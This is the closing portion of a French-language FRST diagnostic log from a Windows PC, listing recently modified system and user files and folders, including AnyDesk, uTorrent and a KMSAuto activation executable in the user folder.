2023-01-14 23:39 - 2022-01-22 15:11 - 000000000 ____D C:\Users\MUSTAPHA\AppData\Roaming\uTorrent
2023-01-14 23:34 - 2021-06-05 13:10 - 000000000 ____D C:\Windows\AppReadiness
2023-01-14 23:29 - 2021-06-05 13:10 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2023-01-14 23:29 - 2021-06-05 13:10 - 000000000 ____D C:\Windows\SystemTemp
2023-01-14 23:29 - 2021-06-05 13:10 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2023-01-14 23:28 - 2021-12-14 19:30 - 001709664 _____ C:\Windows\system32\PerfStringBackup.INI
2023-01-14 23:28 - 2021-06-05 19:15 - 000769848 _____ C:\Windows\system32\perfh00C.dat
2023-01-14 23:28 - 2021-06-05 19:15 - 000148146 _____ C:\Windows\system32\perfc00C.dat
2023-01-14 23:28 - 2021-06-05 13:09 - 000000000 ____D C:\Windows\INF
2023-01-14 23:25 - 2022-07-03 13:46 - 000000000 ____D C:\Users\MUSTAPHA\AppData\Roaming\Messenger
2023-01-14 23:23 - 2022-01-22 15:14 - 000000000 ____D C:\Users\MUSTAPHA\AppData\Local\BitTorrentHelper
2023-01-14 23:23 - 2022-01-16 22:43 - 000000000 ____D C:\Program Files (x86)\Google
2023-01-14 23:21 - 2021-12-14 19:44 - 000000180 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2023-01-14 23:21 - 2021-12-14 19:20 - 000012288 ___SH C:\DumpStack.log.tmp
2023-01-14 23:21 - 2021-12-14 19:20 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2023-01-14 23:20 - 2021-06-05 13:01 - 000524288 _____ C:\Windows\system32\config\BBI
2023-01-14 22:57 - 2021-12-14 19:38 - 000000000 ____D C:\Users\MUSTAPHA\AppData\Local\Packages
2023-01-14 21:46 - 2022-04-01 14:33 - 000000000 ____D C:\Program Files\Microsoft Office
2023-01-14 21:10 - 2022-03-17 22:02 - 000004166 _____ C:\Windows\system32\Tasks\User_Feed_Synchronization-{75A83613-3B9E-4014-A876-E6C90CE1C767}
2023-01-14 21:07 - 2021-12-14 19:20 - 000000000 ____D C:\Windows\system32\SleepStudy
2023-01-14 16:50 - 2021-12-14 19:47 - 000000000 __SHD C:\Users\MUSTAPHA\IntelGraphicsProfiles
2023-01-14 16:07 - 2022-01-22 16:38 - 000000766 __RSH C:\ProgramData\ntuser.pol
2023-01-14 15:51 - 2022-07-03 23:03 - 000000000 ____D C:\Users\MUSTAPHA\Documents\Fichiers Outlook
2023-01-14 15:16 - 2021-12-14 19:37 - 000000000 ____D C:\Users\MUSTAPHA
2023-01-13 12:57 - 2022-01-16 22:45 - 000002245 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2023-01-12 12:35 - 2021-12-14 19:20 - 000485072 _____ C:\Windows\system32\FNTCACHE.DAT
2023-01-12 12:33 - 2022-12-10 13:41 - 000000000 ____D C:\Program Files (x86)\AnyDesk
2023-01-12 12:32 - 2021-06-05 13:10 - 000000000 ____D C:\Windows\SystemResources
2023-01-12 12:32 - 2021-06-05 13:10 - 000000000 ____D C:\Windows\system32\oobe
2023-01-12 12:32 - 2021-06-05 13:10 - 000000000 ____D C:\Windows\bcastdvr
2023-01-11 20:34 - 2021-06-05 13:10 - 000000000 ___HD C:\Program Files\WindowsApps
2023-01-11 10:49 - 2021-06-05 13:01 - 000000000 ____D C:\Windows\CbsTemp
2023-01-11 10:42 - 2021-12-14 19:19 - 000438812 __RSH C:\bootmgr
2023-01-11 10:41 - 2021-12-14 19:22 - 003110912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2023-01-11 10:31 - 2021-12-14 23:17 - 000000000 ____D C:\Windows\system32\MRT
2023-01-11 10:21 - 2021-12-14 23:16 - 150199536 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2023-01-07 15:19 - 2022-01-04 15:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\JODAD
2023-01-07 15:14 - 2022-02-07 21:38 - 000000000 ____D C:\Users\MUSTAPHA\Desktop\Nouveau dossier
2023-01-07 13:41 - 2021-12-14 19:23 - 000002444 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-12-29 17:17 - 2022-06-14 22:38 - 000000000 ____D C:\Users\MUSTAPHA\AppData\Roaming\CamScanner
2022-12-27 20:33 - 2021-12-14 19:22 - 000003536 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2022-12-27 20:33 - 2021-12-14 19:22 - 000003412 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2022-12-26 17:27 - 2022-04-01 16:17 - 000000000 ____D C:\Program Files\Microsoft OneDrive
2022-12-26 13:22 - 2022-11-06 21:38 - 000000437 _____ C:\Windows\system32\Drivers\etc\hosts.ics
2022-12-26 11:21 - 2021-12-14 19:39 - 000000000 ____D C:\ProgramData\Packages
2022-12-26 11:18 - 2022-03-19 12:56 - 000000000 ____D C:\Program Files (x86)\LG Electronics
2022-12-26 11:18 - 2022-01-05 20:57 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2022-12-25 17:59 - 2022-04-29 14:01 - 000000000 ____D C:\Users\MUSTAPHA\AppData\Roaming\Tencent
2022-12-16 20:45 - 2022-12-10 13:41 - 000000000 ____D C:\ProgramData\AnyDesk

==================== Fichiers à la racine de certains dossiers ========

2023-01-14 15:14 - 2023-01-14 15:25 - 000047328 _____ (Microsoft Corporation) C:\Users\MUSTAPHA\activationdriver.exe
2023-01-14 15:14 - 2023-01-14 15:25 - 017987504 _____ () C:\Users\MUSTAPHA\kmsauto++v1.6.4.exe

==================== SigCheck ============================

(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)

==================== Fin de FRST.txt ========================